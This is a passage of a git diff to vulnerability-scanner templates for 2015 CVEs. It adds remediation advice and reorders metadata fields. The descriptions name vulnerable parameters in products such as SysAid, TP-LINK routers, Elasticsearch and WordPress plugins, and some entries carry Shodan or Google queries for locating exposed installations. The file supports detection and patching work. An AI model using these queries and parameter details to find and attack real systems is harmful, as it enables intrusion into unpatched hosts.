b/http/cves/2015/CVE-2015-2863.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. + remediation: | + Apply the latest security patches and updates provided by Kaseya to fix the open redirect vulnerability in the Kaseya Virtual System Administrator (VSA). reference: - https://github.com/pedrib/PoC/blob/3f927b957b86a91ce65b017c4b9c93d05e241592/advisories/Kaseya/kaseya-vsa-vuln.txt - http://www.kb.cert.org/vuls/id/919604 @@ -16,8 +18,8 @@ info: cve-id: CVE-2015-2863 cwe-id: CWE-601 epss-score: 0.00626 - cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* epss-percentile: 0.76316 + cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kaseya diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index e19fb5b916..9e3ac2d7fe 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum. + remediation: | + Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Jun/8 - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk @@ -17,13 +19,13 @@ info: cve-id: CVE-2015-2996 cwe-id: CWE-22 epss-score: 0.77754 - cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* epss-percentile: 0.97813 + cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.favicon.hash:1540720428 vendor: sysaid product: sysaid + shodan-query: http.favicon.hash:1540720428 tags: cve,cve2015,sysaid,lfi,seclists http: diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 7ea064597d..895672cc94 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. + remediation: | + Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Apr/26 - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt @@ -18,14 +20,14 @@ info: cve-id: CVE-2015-3035 cwe-id: CWE-22 epss-score: 0.58993 - cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.97296 + cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"TP-LINK" verified: true + max-request: 1 vendor: tp-link product: tl-wr841n_\(9.0\)_firmware + shodan-query: http.title:"TP-LINK" tags: router,lfi,seclists,cve,cve2015,tplink,kev http: diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index 66b111e85e..c749df2ac1 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. + remediation: | + Upgrade to a patched version of Ruby on Rails or disable the Web Console feature. reference: - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-3224 cwe-id: CWE-284 epss-score: 0.93656 - cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* epss-percentile: 0.98766 + cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rubyonrails diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index e36c5d189c..fbb582185f 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled. + remediation: | + Upgrade to a patched version of Elasticsearch or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/37054/ - https://www.elastic.co/community/security @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-3337 cwe-id: CWE-22 epss-score: 0.96596 - cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* epss-percentile: 0.99448 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elasticsearch diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index c6db360871..e83a389cf0 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. + remediation: | + Upgrade to the latest version of ResourceSpace to fix the local file inclusion vulnerability. reference: - https://vulners.com/cve/CVE-2015-3648/ - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738 @@ -16,8 +18,8 @@ info: cve-id: CVE-2015-3648 cwe-id: CWE-22 epss-score: 0.02644 - cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* epss-percentile: 0.89012 + cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: montala diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 8f0f407892..757fd29613 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. + remediation: | + Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html - https://www.bonitasoft.com/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2015-3897 cwe-id: CWE-22 epss-score: 0.83225 - cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* epss-percentile: 0.97993 + cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: bonitasoft diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index d7ef97134e..1fa80cde3b 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -5,6 +5,8 @@ info: author: ELSFA7110,meme-lord severity: medium description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Symfony. reference: - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-4050 cwe-id: CWE-284 epss-score: 0.00847 - cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* epss-percentile: 0.8003 + cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sensiolabs diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 49cde91888..1c5d7fa538 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -6,28 +6,28 @@ info: severity: medium description: | WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php. + remediation: | + Update to plugin version 0.9.9 or latest. reference: - https://packetstormsecurity.com/files/132038/ - https://wordpress.org/plugins/newstatpress - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4062 - https://wordpress.org/plugins/newstatpress/changelog/ - remediation: | - Update to plugin version 0.9.9 or latest. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:P/A:P cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 epss-score: 0.03336 - cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.90106 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: newstatpress_project product: newstatpress + framework: wordpress tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp http: diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index c3d85e635d..95b0e43b1e 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -6,27 +6,27 @@ info: severity: low description: | WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php. + remediation: Update to plugin version 0.9.9 or latest. reference: - https://packetstormsecurity.com/files/132038/ - https://wordpress.org/plugins/newstatpress/ - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4063 - https://wordpress.org/plugins/newstatpress/changelog/ - remediation: Update to plugin version 0.9.9 or latest. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N cvss-score: 3.5 cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.90916 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: newstatpress_project product: newstatpress + framework: wordpress tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm http: diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 0cb08aab5d..365ca1cc3d 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task. + remediation: | + Upgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html - https://www.exploit-db.com/exploits/37666/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2015-4074 cwe-id: CWE-22 epss-score: 0.00598 - cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* epss-percentile: 0.75681 + cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 - framework: joomla\! vendor: helpdesk_pro_project product: helpdesk_pro + framework: joomla\! tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin http: diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 6542233953..c1c52ef74b 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/. + remediation: | + Update to the latest version of the WordPress Church Admin plugin (0.810 or higher) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/37112 - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408 @@ -17,13 +19,13 @@ info: cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.0034 - cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* epss-percentile: 0.67772 + cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: church_admin_project product: church_admin + framework: wordpress tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss http: diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 0b3a728fd2..bd4520fd3b 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + remediation: | + Update to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/37274 - https://nvd.nist.gov/vuln/detail/CVE-2015-4414 @@ -17,14 +19,14 @@ info: cve-id: CVE-2015-4414 cwe-id: CWE-22 epss-score: 0.11221 - cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* epss-percentile: 0.94441 + cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player" - framework: wordpress vendor: se_html5_album_audio_player_project product: se_html5_album_audio_player + framework: wordpress + google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player" tags: cve,cve2015,wordpress,wp-plugin,lfi,edb,packetstorm http: diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 8da1570978..734920247d 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. + remediation: | + Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/37388 - https://nvd.nist.gov/vuln/detail/CVE-2015-4632 @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-4632 cwe-id: CWE-22 epss-score: 0.05668 - cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* epss-percentile: 0.9233 + cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: koha diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 455a73ce0d..6a9d415637 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter. + remediation: | + Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor. reference: - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-4666 cwe-id: CWE-22 epss-score: 0.03324 - cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* epss-percentile: 0.90091 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xceedium diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 29ed7b75f7..cf5e935f94 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter. + remediation: | + Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability. reference: - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - https://vuldb.com/?id.107082 @@ -18,8 +20,8 @@ info: cve-id: CVE-2015-4668 cwe-id: CWE-601 epss-score: 0.00397 - cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* epss-percentile: 0.70183 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xceedium diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index ffbd2aa17b..49934d3c68 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. + remediation: | + Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed. reference: - https://wordpress.org/plugins/zip-attachments/#developers - https://wpscan.com/vulnerability/8047 @@ -17,14 +19,14 @@ info: cve-id: CVE-2015-4694 cwe-id: CWE-22 epss-score: 0.02304 - cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* epss-percentile: 0.88284 + cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/zip-attachments" - framework: wordpress vendor: zip_attachments_project product: zip_attachments + framework: wordpress + google-query: inurl:"/wp-content/plugins/zip-attachments" tags: cve2015,wp-plugin,wpscan,lfi,wordpress,cve http: diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 0ca88f2a54..342cc2a461 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. + remediation: | + Apply the latest security patches or upgrade to a newer version of Novius OS. reference: - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - https://vuldb.com/?id.76181 @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-5354 cwe-id: CWE-601 epss-score: 0.00166 - cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* epss-percentile: 0.52595 + cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: novius-os diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 03c5ea65e5..ac154585d3 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter. + remediation: | + Update to the latest version of the WordPress StageShow plugin (5.0.9 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 - https://wordpress.org/plugins/stageshow/changelog/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other epss-score: 0.0055 - cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* epss-percentile: 0.74565 + cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/stageshow/" - framework: wordpress vendor: stageshow_project product: stageshow + framework: wordpress + google-query: inurl:"/wp-content/plugins/stageshow/" tags: wpscan,seclists,redirect,cve,cve2015,wordpress,wp-plugin http: diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index f336b3ef93..d1fbad2989 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php. + remediation: | + Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor. reference: - https://www.openwall.com/lists/oss-security/2015/07/10/5 - http://www.vapid.dhs.org/advisory.php?v=133 @@ -16,13 +18,13 @@ info: cve-id: CVE-2015-5469 cwe-id: CWE-22 epss-score: 0.02176 - cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.87946 + cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: mdc_youtube_downloader_project product: mdc_youtube_downloader + framework: wordpress tags: cve,cve2015,wp,lfi http: diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 1145f32d6a..6ca9367a13 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -5,27 +5,27 @@ info: author: 0x_Akoko severity: medium description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system. + remediation: Upgrade to Swim Team version 1.45 or newer. reference: - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - http://www.vapid.dhs.org/advisory.php?v=134 - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html - http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/ - remediation: Upgrade to Swim Team version 1.45 or newer. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2015-5471 cwe-id: CWE-22 epss-score: 0.11139 - cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* epss-percentile: 0.94418 + cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/wp-swimteam" - framework: wordpress vendor: swim_team_project product: swim_team + framework: wordpress + google-query: inurl:"/wp-content/plugins/wp-swimteam" tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm http: diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index a945219cb8..6dafb2f144 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. + remediation: | + Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-5531 cwe-id: CWE-22 epss-score: 0.97074 - cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* epss-percentile: 0.99659 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: elasticsearch diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index b9503c8ba7..bd70549171 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. + remediation: | + Upgrade Geddy to version 13.0.8 or later to mitigate the vulnerability. reference: - https://nodesecurity.io/advisories/geddy-directory-traversal - https://github.com/geddy/geddy/issues/697 @@ -17,13 +19,13 @@ info: cve-id: CVE-2015-5688 cwe-id: CWE-22 epss-score: 0.01347 - cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* epss-percentile: 0.84447 + cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 - framework: node.js vendor: geddyjs product: geddy + framework: node.js tags: cve,cve2015,geddy,lfi http: diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index f07fa8bb69..3b62efb3e0 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Dec/117 - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-6477 cwe-id: CWE-79 epss-score: 0.00294 - cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* epss-percentile: 0.65327 + cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nordex diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 73c473aa05..1f58a92ffb 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title. + remediation: | + Upgrade to a version of Combodo iTop that is equal to or greater than 2.2.0-2459 to mitigate this vulnerability. reference: - https://www.htbridge.com/advisory/HTB23268 - http://sourceforge.net/p/itop/tickets/1114/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-6544 cwe-id: CWE-79 epss-score: 0.00284 - cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* epss-percentile: 0.64643 + cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: combodo diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 4fd826dca3..da3b7a9567 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress 